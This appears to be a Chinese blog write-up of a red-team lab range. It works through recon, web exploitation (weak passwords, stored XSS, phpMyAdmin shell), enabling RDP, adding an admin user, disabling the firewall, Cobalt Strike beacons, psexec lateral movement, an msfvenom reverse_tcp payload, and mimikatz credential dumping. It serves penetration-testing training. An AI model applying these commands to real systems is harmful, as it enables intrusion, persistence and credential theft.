ATT&CK红队评估实战靶场(一)

文章目录

前言

靶机下载地址:ATT&CK红队评估实战靶场
拓扑图:
ATT&CK红队评估实战靶场(一)
通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。

环境搭建

名字 host passwd 说明
windos7 192.168.93.160/24 192.168.142.128/24 hongrisec@2019 web服务器
win2K2 192.168.142.129/24 hongrisec@2020 域成员
windows server 2008 r2 192.168.142.130/24 hongrisec@2020 域控制器
kali 192.168.93.129/24 kali attack

ATT&CK红队评估实战靶场(一)

测试网络连通性

windows7 ping win2k2 、 windows server 2012
ATT&CK红队评估实战靶场(一)
这里win2k2互相ping
ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
kali机与WEB联通
这里因为win7开了防火墙ping不通。

攻入内网

信息收集

探测同网段主机存活

nmap -sT 192.168.93.160
ATT&CK红队评估实战靶场(一)

探测端口

nmap -sT 192.168.68.160
ATT&CK红队评估实战靶场(一)

操作系统、版本

nmap –T4 –A
ATT&CK红队评估实战靶场(一)

利用可用端口

经过前面的扫描发现80端口开启这里我们直接访问。
ATT&CK红队评估实战靶场(一)
这里发现一个php探针,好家伙基本信息都在这里了,还要扫描信息收集吗?
但是看了一眼发现还是没有网站目录,这里直接用工具扫描,这里用的工具是dirsearch

./dirsearch.py -u 192.168.93.160 e*
ATT&CK红队评估实战靶场(一)

漏洞一_信息泄露+弱口令

ATT&CK红队评估实战靶场(一)

漏洞二_存储型XSS

ATT&CK红队评估实战靶场(一)

ATT&CK红队评估实战靶场(一)
需要后台审核,用来获取管理员cookie。

漏洞三_任意修改文件

ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
蚂蚁剑直接连接

漏洞四_phpadmin文件写入

通过 phpmyadmin getshell参考链接
然后这里探针这里暴露了绝对路径。
ATT&CK红队评估实战靶场(一)
然后直接根据上面那篇文章,getshell。

ATT&CK红队评估实战靶场(一)

远程连接

这是在win7上进行的,根本没有打进win7的内网。利用蚁剑终端,查看开启端口,并给win7添加用户,之后要用3389远程连接桌面:
ATT&CK红队评估实战靶场(一)
这里没有开启端口,我们直接百度一下。

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

ATT&CK红队评估实战靶场(一)

接下来创建用户,把用户加入管理员组获得权限。
ATT&CK红队评估实战靶场(一)
先关一下防火墙
ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)

参考文章:内网渗透学习导航

域信息收集

一、什么是域

域是计算机网络的一种形式,其中所有用户帐户 ,计算机,打印机和其他安全主体都在位于称为域控制器的一个或多个*计算机集群上的*数据库中注册。 身份验证在域控制器上进行。 在域中使用计算机的每个人都会收到一个唯一的用户帐户,然后可以为该帐户分配对该域内资源的访问权限。 从Windows Server 2003开始 , Active Directory是负责维护该*数据库的Windows组件。Windows域的概念与工作组的概念形成对比,在该工作组中,每台计算机都维护自己的安全主体数据库。

kali先启动cs
启动服务端
ATT&CK红队评估实战靶场(一)
启动客户端
ATT&CK红队评估实战靶场(一)
在Attacks->packags下的windows executable(s)选择监听,创建个木马
ATT&CK红队评估实战靶场(一)
生成一个txt文件在主机powershell里运行
ATT&CK红队评估实战靶场(一)
成功上线

判断是否存在域

使用 ipconfig /all 查看 DNS 服务器:

shell ipconfig /all

ATT&CK红队评估实战靶场(一)
发现 DNS 服务器名为 god.org,查看域信息:net view

shell net view

ATT&CK红队评估实战靶场(一)
查看主域信息:net view /domain

shell net view /domain

ATT&CK红队评估实战靶场(一)
查询当前的登录域与用户信息:net config workstation
ATT&CK红队评估实战靶场(一)
可以很清楚看出有无域。
使用 dump hash模块导出散列值,获取凭据 (access->dump hashs)
ATT&CK红队评估实战靶场(一)
使用logonpasswords模块,调用内置在CS中的mimikatz将内存中的lsass.exe进程保存的用户明文密码和散列导出
ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)

横向移动

接下来就是横向移动,但是由于内网机是无法直接和外网连接的,这将win7当成跳板机。

官网介绍:SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。
因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。
ATT&CK红队评估实战靶场(一)
首先新建一个监听
ATT&CK红队评估实战靶场(一)
然后使用之前获取的主机信息和凭据,使用psexec模块进行登入。
ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
成功上线
ATT&CK红队评估实战靶场(一)

MSF反弹shell

参考文章:链接
植入windows后门:

>payload:msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

ATT&CK红队评估实战靶场(一)
在msfconsole中进行配置
ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
windows7执行
ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
下面我们就该去杀入域控了,杀入域之前我们先来做一些基础的信息收集,毕竟大佬说过渗透测试的本质是信息收集…

ipconfig /all 查询本机IP段,所在域等
net config Workstation 当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user 本机用户列表
net localhroup administrators 本机管理员[通常含有域用户]
net user /domain 查询域用户
net user 用户名 /domain 获取指定用户的账户信息
net user /domain b404 pass 修改域内用户密码,需要管理员权限
net group /domain 查询域里面的工作组
net group 组名 /domain 查询域中的某工作组
net group “domain admins” /domain 查询域管理员列表
net group “domain controllers” /domain 查看域控制器(如果有多台)
net time /domain 判断主域,主域服务器都做时间服务器
ipconfig /all 查询本机IP段,所在域等

在本环境中我们是没有办法直接抓取明文的,当然也有办法绕过就是自己上传一个mimitakz使用debug进行明文抓取

我们先把mimitakz(实战中需要免杀处理)上传上去:

upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\phpStudy\WWW\yxcms

ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
ATT&CK红队评估实战靶场(一)
参考文章:神器mimikatz使用命令方法总结
提升权限

privilege::debug

ATT&CK红队评估实战靶场(一)
抓取明文密码:

sekurlsa::logonpasswords

ATT&CK红队评估实战靶场(一)

上一篇:ClickHouse常用命令,基本数据类型


下一篇:基于MATLAB实现的龙贝格求积分算法